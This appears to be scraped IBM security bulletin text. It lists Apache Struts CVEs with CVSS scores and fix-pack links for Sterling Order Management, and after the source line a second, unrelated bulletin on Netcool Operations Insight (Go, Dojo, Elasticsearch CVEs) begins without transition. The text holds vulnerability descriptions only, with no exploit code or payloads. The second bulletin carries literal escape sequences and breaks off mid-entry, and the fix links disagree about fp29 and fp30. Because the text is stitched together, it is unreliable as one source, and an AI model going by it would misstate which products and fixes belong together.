**CVEID:** [CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system.
CVSS Base score: 6.8
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/85573> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92740> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/84762> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 5.6
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/112528> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method.
An attacker could exploit this vulnerability using CookieInterceptor, when it is configured to accept all cookies, to manipulate the ClassLoader used by the application server and execute arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92742> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/84763> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/186702> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>)
**DESCRIPTION:** An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution.
CVSS Base score: 10
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/87373> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

**CVEID:** [CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/72229> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system.
CVSS Base score: 5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/72089> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
CVSS Base score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/78182> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111514> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:** [CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of the cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site.
CVSS Base score: 5.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113686> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:** [CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system.
CVSS Base score: 5.8
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/87336> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N)

**CVEID:** [CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server.
CVSS Base score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/93024> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>)
**DESCRIPTION:** XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/60371> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 8.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/192743> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse an arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/112527> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>)
**DESCRIPTION:** An unspecified error in Apache Struts related to the method used to clean up action names has an unknown impact and attack vector.
CVSS Base score: 5.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114183> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/85756> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in a Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 7.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/131603> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user's session.
CVSS Base score: 9.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/106695> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:** [CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/84543> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/84542> for the current score.
CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

**CVEID:** [CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites.
CVSS Base score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/85755> for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

**CVEID:** [CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/106172> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:** [CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 6.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/105879> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

## Affected Products and Versions

Affected Product(s) | Version(s)
---|---
IBM Sterling Order Management | 10.0
IBM Sterling Order Management | 9.5.x

## Remediation/Fixes

IBM strongly recommends addressing the vulnerability now by upgrading to the latest fix pack, which carries the upgraded version of Apache Struts. Note that the fix pack applies only to IBM Sterling Order Management version 10.0; if you are running IBM Sterling Order Management version 9.5, a product upgrade must be completed first. IBM Sterling Order Management version 9.5 reached end of support on April 30, 2022.

Order Management installing Fix Pack 29 - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29> (see also <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30>)

Fix Pack 29 download location - <https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>

Note that the fix ID in the download link above is 10.0.0.0-Sterling-SSFF-All-fp30-Installer, while the Fix Central quick-order link below references the fp29 installer; confirm the fix pack level on Fix Central before installing.

Creating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>

On-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>

Fix Central Link (FP details URL):
<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>

## Workarounds and Mitigations

IBM strongly recommends addressing the vulnerability now by following the steps above on product version 10.0. Version 9.5 has been out of support since April 30, 2022. If you need further clarification regarding 9.5 end of support, log4j and version 9.5, please contact IBM support.

Source: IBM Security Bulletin "IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)", published 2022-09-14, <https://www.ibm.com/support/pages/node/6620355>. Bulletin-level CVSS: v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), v3 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). CVEs addressed: CVE-2010-1870, CVE-2011-1772, CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0393, CVE-2012-0838, CVE-2012-1006, CVE-2012-4386, CVE-2012-4387, CVE-2013-1965, CVE-2013-1966, CVE-2013-2115, CVE-2013-2134, CVE-2013-2135, CVE-2013-2248, CVE-2013-2251, CVE-2013-4310, CVE-2013-4316, CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116, CVE-2014-7809, CVE-2015-2992, CVE-2015-5169, CVE-2015-5209, CVE-2016-3081, CVE-2016-3082, CVE-2016-3093, CVE-2016-4003, CVE-2016-4436, CVE-2017-12611, CVE-2019-0230, CVE-2019-0233, CVE-2020-17530.

## Summary

Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities, listed in the CVEs below.

## Vulnerability Details

**CVEID:** [CVE-2021-23450](<https://vulners.com/cve/CVE-2021-23450>)
**DESCRIPTION:** Dojo could allow a remote attacker to execute arbitrary code on the system, caused by prototype pollution in the setObject function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/216463> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-22144](<https://vulners.com/cve/CVE-2021-22144>)
**DESCRIPTION:** Elasticsearch is vulnerable to a denial of service, caused by an uncontrolled recursion vulnerability in the Elasticsearch Grok parser. By creating a specially crafted Grok query, a remote authenticated attacker could exploit this vulnerability to cause a denial of service.
CVSS Base score: 5.7
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/206321> for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 8.1
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/223990> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2020-14039](<https://vulners.com/cve/CVE-2020-14039>)
**DESCRIPTION:** Go could allow a remote attacker to bypass security restrictions, caused by improper validation of the VerifyOptions.KeyUsages EKU requirements during X.509 certificate verification. An attacker could exploit this vulnerability to gain access to the system.
CVSS Base score: 5.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/185443> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:** [CVE-2020-15586](<https://vulners.com/cve/CVE-2020-15586>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a data race in some net/http servers. By sending specially-crafted HTTP requests, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/185446> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2020-16845](<https://vulners.com/cve/CVE-2020-16845>)
**DESCRIPTION:** Go Language is vulnerable to a denial of service, caused by an infinite read loop in ReadUvarint and ReadVarint in encoding/binary. By sending specially-crafted input, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/186375> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2020-24553](<https://vulners.com/cve/CVE-2020-24553>)
**DESCRIPTION:** Golang Go is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the CGI/FCGI handlers. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base score: 7.2
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/187776> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)

**CVEID:** [CVE-2020-28362](<https://vulners.com/cve/CVE-2020-28362>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by improper input validation by the math/big.Int methods. By sending specially-crafted inputs, a remote attacker could exploit this vulnerability to cause the application to crash.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/191976> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2020-28366](<https://vulners.com/cve/CVE-2020-28366>)
**DESCRIPTION:** Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by a code injection flaw in the go command when cgo is in use at build time. By using a specially-crafted package, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/191978> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2020-28367](<https://vulners.com/cve/CVE-2020-28367>)
**DESCRIPTION:** Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by an argument injection flaw in the go command when cgo is in use at build time. By using a specially-crafted package, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/191979> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2020-7919](<https://vulners.com/cve/CVE-2020-7919>)
**DESCRIPTION:** Go is vulnerable to a denial of service. By sending a malformed X.509 certificate, a remote attacker could exploit this vulnerability to cause a system panic.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/178227> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-27918](<https://vulners.com/cve/CVE-2021-27918>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by an infinite loop flaw when using xml.NewTokenDecoder with a custom TokenReader. By persuading a victim to open specially-crafted XML content, a remote attacker could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 5.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/198075> for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-29923](<https://vulners.com/cve/CVE-2021-29923>)
**DESCRIPTION:** Golang Go could allow a remote attacker to bypass security restrictions, caused by improper consideration for extraneous zero characters at the beginning of an IP address octet. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access control based on IP addresses.
CVSS Base score: 7.5
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/207025> for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:** [CVE-2021-3114](<https://vulners.com/cve/CVE-2021-3114>)
**DESCRIPTION:** An unspecified error in Golang Go, in which the P224() curve implementation can generate incorrect outputs, has an unknown impact and attack vector.
\nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/195677](<https://exchange.xforce.ibmcloud.com/vulnerabilities/195677>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-31525](<https://vulners.com/cve/CVE-2021-31525>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in net/http. By sending a specially-crafted header to ReadRequest or ReadResponse. Server, Transport, and Client, a remote attacker could exploit this vulnerability to cause a (panic) denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202709](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202709>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-33195](<https://vulners.com/cve/CVE-2021-33195>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by not following RFC 1035 rules in the LookupCNAME, LookupSRV, LookupMX, LookupNS, and LookupAddr functions in net. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-33196](<https://vulners.com/cve/CVE-2021-33196>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in the NewReader and OpenReader functions in archive/zip. 
By persuading a victim to open a specially-crafted archive file, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, resulting in a denial of service condition.
CVSS Base score: 5.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/206602](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206602>) for the current score.
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-33197](<https://vulners.com/cve/CVE-2021-33197>)
**DESCRIPTION:** Golang Go could allow a remote attacker to bypass security restrictions, caused by a flaw in the ReverseProxy in net/http/httputil. By sending a specially-crafted request, an attacker could exploit this vulnerability to drop arbitrary headers, including those set by the ReverseProxy.Director.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/206603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206603>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:** [CVE-2021-33198](<https://vulners.com/cve/CVE-2021-33198>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a flaw in the SetString and UnmarshalText methods of math/big.Rat. By sending specially-crafted input, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, resulting in a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/206604](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206604>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-36221](<https://vulners.com/cve/CVE-2021-36221>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a race condition upon an ErrAbortHandler abort.
By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a net/http/httputil ReverseProxy panic.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/207036](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207036>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-38297](<https://vulners.com/cve/CVE-2021-38297>)
**DESCRIPTION:** Golang Go is vulnerable to a buffer overflow, caused by improper bounds checking when invoking functions from WASM modules. By passing very large arguments, a remote attacker could overflow a buffer and execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/211507](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211507>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2021-39293](<https://vulners.com/cve/CVE-2021-39293>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by a flaw in the NewReader and OpenReader functions in archive/zip. By sending a specially-crafted archive header, a remote attacker could exploit this vulnerability to cause a panic, which results in a denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/220196](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220196>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-41771](<https://vulners.com/cve/CVE-2021-41771>)
**DESCRIPTION:** Golang Go is vulnerable to a denial of service, caused by an out-of-bounds slice situation in the ImportedSymbols function in debug/macho.
By using specially-crafted binaries, a remote attacker could exploit this vulnerability to cause a panic, resulting in a denial of service condition.
CVSS Base score: 7.5
